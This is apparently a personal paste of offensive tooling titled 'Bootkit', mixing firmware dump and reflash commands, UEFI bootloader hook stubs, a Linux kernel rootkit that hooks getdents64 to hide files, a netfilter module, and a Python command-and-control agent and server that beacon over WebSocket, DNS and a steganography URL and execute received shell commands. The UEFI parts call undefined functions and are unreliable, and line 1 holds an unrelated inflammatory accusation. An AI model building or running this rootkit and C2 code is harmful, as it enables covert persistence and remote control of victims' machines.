Bootkit

1. Hunter biden laptop contained CP i will die on this hill
2. rootkit
3. #check firmware
4. sudo dmidecode -t bios
5. #dump uefi
6. sudo flashrom -p internal -r bios_backup.bin
7. #extract modules and for modification
8. uefi-firmware-parser bios_backup.bin
9.  
10.  
11. #include <efi.h>
12. #include <efilib.h>
13.  
14. EFI_STATUS EFIAPI UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable) {
15. InitializeLib(ImageHandle, SystemTable);
16.  
17. // Hook Windows Bootloader
18. CHAR16 *BootLoader = L"\\EFI\\Microsoft\\Boot\\bootmgfw.efi";
19. SystemTable->BootServices->LoadImage(FALSE, ImageHandle, BootLoader, NULL, 0, NULL);
20.  
21. // Inject Code into Kernel
22. InjectCodeIntoKernel();
23.  
24. return EFI_SUCCESS;
25. }
26. Bootloader
27. #include <efi.h>
28. #include <efilib.h>
29.  
30. EFI_STATUS EFIAPI UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable) {
31. InitializeLib(ImageHandle, SystemTable);
32.  
33. CHAR16 *BootLoader = L"\\EFI\\Microsoft\\Boot\\bootmgfw.efi";
34. SystemTable->BootServices->LoadImage(FALSE, ImageHandle, BootLoader, NULL, 0, NULL);
35.  
36. // Inject malware into kernel memory
37. InjectCodeIntoKernel();
38.  
39. return EFI_SUCCESS;
40. }
41. ///////////////////////////////////
42. Minimal hypervisor
43. #include <linux/module.h>
44. #include <linux/kernel.h>
45. #include <linux/init.h>
46. #include <asm/io.h>
47. #include <asm/msr.h>
48.  
49. static void enable_vmx(void) {
50. unsigned long cr4;
51. asm volatile("mov %%cr4, %0" : "=r" (cr4));
52. cr4 |= 0x2000; // Set VMX Enable Bit
53. asm volatile("mov %0, %%cr4" :: "r" (cr4));
54. }
55.  
56. static int __init hypervisor_init(void) {
57. enable_vmx();
58. printk(KERN_INFO "Hypervisor Rootkit: VMX Enabled\n");
59. return 0;
60. }
61.  
62. static void __exit hypervisor_exit(void) {
63. printk(KERN_INFO "Hypervisor Rootkit: Unloaded\n");
64. }
65.  
66. module_init(hypervisor_init);
67. module_exit(hypervisor_exit);
68. MODULE_LICENSE("GPL");
69. //////////////////////////////////////
70. hypervisor loading
71. sudo flashrom -p internal -r bios_backup.bin
72. uefi-firmware-parser bios_backup.bin
73.  
74. EFI_STATUS EFIAPI UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable) {
75. InitializeLib(ImageHandle, SystemTable);
76. CHAR16 *BootLoader = L"\\EFI\\Microsoft\\Boot\\bootmgfw.efi";
77. SystemTable->BootServices->LoadImage(FALSE, ImageHandle, BootLoader, NULL, 0, NULL);
78. InjectHypervisor();
79. return EFI_SUCCESS;
80. }
81. sudo flashrom -p internal -w modified_bios.bin
82. /////////////////////////////////////////////
83. Hooking system
84. #include <linux/module.h>
85. #include <linux/kernel.h>
86. #include <linux/sched.h>
87. #include <linux/syscalls.h>
88.  
89. unsigned long **sys_call_table;
90. asmlinkage long (*original_getdents)(unsigned int, struct linux_dirent64 *, unsigned int);
91.  
92. asmlinkage long hooked_getdents(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count) {
93. long ret = original_getdents(fd, dirp, count);
94. struct linux_dirent64 *d;
95. int bpos = 0;
96.  
97. for (bpos = 0; bpos < ret;) {
98. d = (struct linux_dirent64 *)((char *)dirp + bpos);
99. if (strstr(d->d_name, "hidden_process")) {
100. memmove(d, (char *)d + d->d_reclen, ret - bpos - d->d_reclen);
101. ret -= d->d_reclen;
102. } else {
103. bpos += d->d_reclen;
104. }
105. }
106. return ret;
107. }
108.  
109. static int __init rootkit_init(void) {
110. sys_call_table = (unsigned long **)kallsyms_lookup_name("sys_call_table");
111. write_cr0(read_cr0() & (~0x10000));
112. original_getdents = (void *)sys_call_table[__NR_getdents64];
113. sys_call_table[__NR_getdents64] = (unsigned long *)hooked_getdents;
114. write_cr0(read_cr0() | 0x10000);
115. return 0;
116. }
117.  
118. static void __exit rootkit_exit(void) {
119. write_cr0(read_cr0() & (~0x10000));
120. sys_call_table[__NR_getdents64] = (unsigned long *)original_getdents;
121. write_cr0(read_cr0() | 0x10000);
122. }
123. /////////////////////////////////////////////////
124.  
125. hooking system calls
126. #include <linux/module.h>
127. #include <linux/kernel.h>
128. #include <linux/sched.h>
129. #include <linux/syscalls.h>
130.  
131. unsigned long **sys_call_table;
132. asmlinkage long (*original_getdents)(unsigned int, struct linux_dirent64 *, unsigned int);
133.  
134. asmlinkage long hooked_getdents(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count) {
135. long ret = original_getdents(fd, dirp, count);
136. struct linux_dirent64 *d;
137. int bpos = 0;
138.  
139. for (bpos = 0; bpos < ret;) {
140. d = (struct linux_dirent64 *)((char *)dirp + bpos);
141. if (strstr(d->d_name, "hidden_process")) {
142. memmove(d, (char *)d + d->d_reclen, ret - bpos - d->d_reclen);
143. ret -= d->d_reclen;
144. } else {
145. bpos += d->d_reclen;
146. }
147. }
148. return ret;
149. }
150.  
151. static int __init rootkit_init(void) {
152. sys_call_table = (unsigned long **)kallsyms_lookup_name("sys_call_table");
153. write_cr0(read_cr0() & (~0x10000));
154. original_getdents = (void *)sys_call_table[__NR_getdents64];
155. sys_call_table[__NR_getdents64] = (unsigned long *)hooked_getdents;
156. write_cr0(read_cr0() | 0x10000);
157. return 0;
158. }
159.  
160. static void __exit rootkit_exit(void) {
161. write_cr0(read_cr0() & (~0x10000));
162. sys_call_table[__NR_getdents64] = (unsigned long *)original_getdents;
163. write_cr0(read_cr0() | 0x10000);
164. }
165.  
166. module_init(rootkit_init);
167. module_exit(rootkit_exit);
168. MODULE_LICENSE("GPL");
169. //////////////////////////////////////////
170. core ntework hooking
171. #include <linux/module.h>
172. #include <linux/kernel.h>
173. #include <linux/netfilter.h>
174. #include <linux/netfilter_ipv4.h>
175. #include <linux/ip.h>
176. #include <linux/tcp.h>
177.  
178. static struct nf_hook_ops netfilter_ops;
179.  
180. unsigned int packet_filter(void *priv, struct sk_buff *skb, const struct nf_hook_state *state) {
181. struct iphdr *ip_header = ip_hdr(skb);
182. struct tcphdr *tcp_header;
183.  
184. if (!ip_header) return NF_ACCEPT;
185. if (ip_header->protocol == IPPROTO_TCP) {
186. tcp_header = tcp_hdr(skb);
187. if (ntohs(tcp_header->dest) == 4444) {
188. printk(KERN_INFO "Intercepted C2 connection on port 4444\n");
189. return NF_DROP;
190. }
191. }
192. return NF_ACCEPT;
193. }
194.  
195. static int __init netfilter_init(void) {
196. netfilter_ops.hook = packet_filter;
197. netfilter_ops.pf = PF_INET;
198. netfilter_ops.hooknum = NF_INET_PRE_ROUTING;
199. netfilter_ops.priority = NF_IP_PRI_FIRST;
200. nf_register_hook(&netfilter_ops);
201. return 0;
202. }
203.  
204. static void __exit netfilter_exit(void) {
205. nf_unregister_hook(&netfilter_ops);
206. }
207.  
208. module_init(netfilter_init);
209. module_exit(netfilter_exit);
210. MODULE_LICENSE("GPL");
211. /////////////////////////////////
212. c2 client
213. import websocket
214. import dns.resolver
215. import base64
216. import os
217. import subprocess
218. import requests
219. import json
220.  
221. C2_WEBSOCKET = "ws://your-c2-server.com/ws"
222. DNS_C2_DOMAIN = "c2.yourdns.com"
223. STEGO_URL = "http://your-c2-server.com/stego/payload.png"
224.  
225. def execute_command(cmd):
226. try:
227. return subprocess.check_output(cmd, shell=True).decode()
228. except Exception as e:
229. return str(e)
230.  
231. def beacon_ws():
232. ws = websocket.WebSocket()
233. ws.connect(C2_WEBSOCKET)
234. ws.send(os.getlogin()) # Send unique identifier
235. while True:
236. message = ws.recv()
237. command = json.loads(message).get("cmd", "")
238. if command:
239. result = execute_command(command)
240. ws.send(result)
241.  
242. def beacon_dns():
243. try:
244. response = dns.resolver.resolve(DNS_C2_DOMAIN, "TXT")
245. command = base64.b64decode(response[0].to_text().strip('"')).decode()
246. execute_command(command)
247. except:
248. pass
249.  
250. def fetch_stego_payload():
251. response = requests.get(STEGO_URL)
252. with open("/tmp/stego.png", "wb") as f:
253. f.write(response.content)
254.  
255. def covert_execute():
256. # Detect best C2 method (WebSocket > DNS > Stego)
257. try:
258. beacon_ws()
259. except:
260. try:
261. beacon_dns()
262. except:
263. fetch_stego_payload()
264.  
265. if __name__ == "__main__":
266. covert_execute()
267. //////////////////////////////////////////////
268. c2 client
269. from flask import Flask, request, send_file
270. from flask_sockets import Sockets
271. import base64
272. import json
273. import os
274. import threading
275. import dns.resolver
276.  
277. app = Flask(__name__)
278. sockets = Sockets(app)
279.  
280. C2_LOGS = "c2_logs.txt"
281. CONNECTED_AGENTS = {}
282.  
283. def log_command(command):
284. with open(C2_LOGS, "a") as log:
285. log.write(command + "\n")
286.  
287. @sockets.route('/ws')
288. def handle_ws(ws):
289. agent_id = ws.receive()
290. CONNECTED_AGENTS[agent_id] = ws
291. print(f"[+] Agent Connected: {agent_id}")
292.  
293. while not ws.closed:
294. command = input("C2> ")
295. if command == "list":
296. print(CONNECTED_AGENTS.keys())
297. elif command.startswith("exec"):
298. _, agent, cmd = command.split(" ", 2)
299. if agent in CONNECTED_AGENTS:
300. CONNECTED_AGENTS[agent].send(json.dumps({"cmd": cmd}))
301. log_command(f"{agent}: {cmd}")
302. elif command == "exit":
303. ws.close()
304.  
305. @app.route('/dns_c2/<query>')
306. def dns_c2(query):
307. """
308. Encodes C2 commands inside DNS TXT record responses
309. """
310. command = get_command_from_dns(query)
311. return base64.b64encode(command.encode()).decode()
312.  
313. def get_command_from_dns(query):
314. # Example of reading commands via DNS queries
315. try:
316. response = dns.resolver.resolve(query, "TXT")
317. return response[0].to_text().strip('"')
318. except:
319. return "sleep"
320.  
321. @app.route('/stego/<img_name>')
322. def stego_payload(img_name):
323. """
324. Delivers payloads hidden in image files.
325. """
326. return send_file(f"stego_payloads/{img_name}", mimetype='image/png')
327.  
328. if __name__ == "__main__":
329. app.run(host="0.0.0.0", port=5000, threaded=True)